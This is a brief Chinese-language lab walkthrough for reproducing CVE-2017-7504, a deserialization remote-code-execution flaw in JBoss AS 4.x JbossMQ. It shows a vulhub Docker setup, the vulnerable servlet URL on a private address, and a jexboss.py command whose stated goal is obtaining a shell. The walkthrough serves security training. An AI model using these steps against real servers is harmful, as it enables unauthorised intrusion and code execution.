漏洞介绍
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的
HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏
任意代码执⾏
影响范围
JBoss 4.x 以及之前的所有版本
环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
漏洞复现
1.访问漏洞地址
172.16.1.81:8080/jbossmq-httpil/HTTPServerILServlet
2.获取shell
python3 jexboss.py -u
http://172.16.1.81:8080/
